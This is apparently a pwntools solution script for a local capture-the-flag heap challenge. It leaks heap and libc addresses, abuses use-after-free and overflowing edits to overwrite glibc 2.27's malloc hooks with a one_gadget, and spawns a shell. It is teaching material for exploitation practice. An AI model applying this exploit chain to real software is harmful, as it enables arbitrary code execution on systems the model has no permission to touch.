# CTF solution script for a local heap challenge binary (./chall) running against a
# bundled glibc 2.27. Everything below talks to a locally spawned process only.
from pwn import *  # NOTE: star import; brings ELF, process, gdb, context, u64/p64, log into scope
context(arch = 'amd64',os = 'linux')
elf = ELF("./chall")
# Absolute paths are specific to the author's machine; they must be adjusted on another host.
libc = ELF("/home/shoucheng/glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64/libc-2.27.so")
ld = ELF("/home/shoucheng/glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64/ld-2.27.so")
# Start the binary through the matching loader with that libc preloaded -- presumably so the
# libc-relative offsets used later line up with the bundled 2.27 build rather than the system libc.
p = process(argv=[ld.path,elf.path],env={"LD_PRELOAD" : libc.path})
def debug():
    """Attach gdb to the spawned target and stop at main (local debugging aid only)."""
    breakpoints = "b main"
    gdb.attach(p, breakpoints)
_PROMPT = ">>> "


def add(size, content):
    """Drive the target's 'create' menu entry.

    Waits for the ``>>> `` prompt before each answer, then sends the
    opcode/passwd header the binary expects, the allocation ``size`` as a
    line, and finally ``content`` as raw bytes (no trailing newline).
    """
    steps = (
        (p.send, "opcode:1\npasswd:Cr4at31\n\r\r\n"),
        (p.sendline, str(size)),
        (p.send, content),
    )
    for transmit, payload in steps:
        p.recvuntil(_PROMPT)
        transmit(payload)


def edit(idx, content):
    """Drive the target's 'edit' menu entry for slot ``idx``.

    Same prompt/answer rhythm as ``add``: header, slot index as a line,
    then the raw replacement ``content``.
    """
    steps = (
        (p.send, "opcode:3\npasswd:Ed1t1\n\r\r\n"),
        (p.sendline, str(idx)),
        (p.send, content),
    )
    for transmit, payload in steps:
        p.recvuntil(_PROMPT)
        transmit(payload)
def show(idx):
    """Drive the target's 'show' menu entry for slot ``idx``.

    The response is deliberately left unread so the caller can parse it.
    """
    header = "opcode:2\npasswd:SH0w1\n\r\r\n"
    p.recvuntil(">>> ")
    p.send(header)
    p.recvuntil(">>> ")
    p.sendline(str(idx))
def free(idx):
    """Drive the target's 'delete' menu entry for slot ``idx``."""
    header = "opcode:4\npasswd:D3l4te1\n\r\r\n"
    p.recvuntil(">>> ")
    p.send(header)
    p.recvuntil(">>> ")
    p.sendline(str(idx))
''' 0x4f3d5 execve("/bin/sh", rsp+0x40, environ) constraints: rsp & 0xf == 0 rcx == NULL
0x4f432 execve("/bin/sh", rsp+0x40, environ) constraints: [rsp+0x40] == NULL
0x10a41c execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL '''
# --- main flow (flat script; statement order matters, so left exactly as written) ---
# NOTE(review): the original was collapsed onto one line; the line breaks below are a
# reconstruction. Where the loop extent is ambiguous it is flagged.

# Three 0x208-byte allocations, each filled with a distinct marker byte.
add(0x208, 'c'*0x208)
add(0x208, 'b'*0x208)
add(0x208, 'a'*0x208)
# NOTE(review): show(0) is followed by waiting for the 'a' fill, although slot 0 was
# filled with 'c' -- presumably the target indexes from the most recent allocation or
# prints more than one entry; confirm against the binary.
show(0)
p.recvuntil('a'*0x208)
# The six bytes printed right after the 0x208-byte fill are read as a little-endian
# pointer; 0x4c0 is the script's offset from that value to the heap base. Getting bytes
# past the fill implies the target prints the buffer without a terminator -- TODO confirm.
# NOTE: str padding ('\x00') on recv() output implies Python 2 pwntools; under Python 3
# recv() returns bytes and this ljust would need a bytes fill value.
heap_addr = u64(p.recv(6).ljust(8,'\x00')) - 0x4c0
log.info("heap_addr==>0x%x" %heap_addr)
# Five more same-size allocations.
for i in range(5):
    add(0x208,'a'*0x208)
# Slot 0 is freed repeatedly. This only works if the target keeps the slot usable after
# free (the weakness the script depends on). NOTE(review): the collapsed source does not
# show whether the trailing free(0) sits inside or after the loop -- confirm the count.
for i in range(7):
    free(0)
free(0)
add(0x208,'a'*0x208)
# 0x208 bytes of fill plus an 8-byte pointer is 0x210 bytes into a 0x208-byte slot, so
# the edit path apparently accepts more than the allocation size -- TODO confirm.
edit(0,'a'*0x208 + p64(heap_addr + 0x2e0))
show(1)
# Second six-byte read, interpreted as a libc pointer; 0x3ebca0 is the script's offset
# from it to the libc base.
libc_base = u64(p.recv(6).ljust(8,'\x00')) - 0x3ebca0
log.info("libc_base==>0x%x" %libc_base)
# Symbols resolved from the bundled libc-2.27 (these hook symbols exist in that
# version); 0x4f432 is the gadget address quoted in the listing above.
mlh = libc_base + libc.sym['__malloc_hook']
realloc = libc_base + libc.sym['__libc_realloc']
ogg = libc_base + 0x4f432
# Two further over-size edits: the first points slot 0's trailing pointer at mlh - 8,
# the second writes ogg followed by realloc + 9 starting there (presumably
# __realloc_hook then __malloc_hook in this libc layout -- confirm).
edit(0, 'a'*0x208 + p64(mlh - 0x8))
edit(1, p64(ogg) + p64(realloc + 9))
# One more 'create' request issued by hand (same header bytes add() sends) so the
# allocation path runs with the hooks in place; interactive() then hands over the I/O.
p.recvuntil(">>> ")
p.send("opcode:1\npasswd:Cr4at31\n\r\r\n")
p.interactive()
# Defensive takeaway (inferred from the steps above, confirm against the binary): the
# chain relies on slots remaining usable after free, on prints without a terminator, and
# on edit/create writes not being bounded by the allocation size.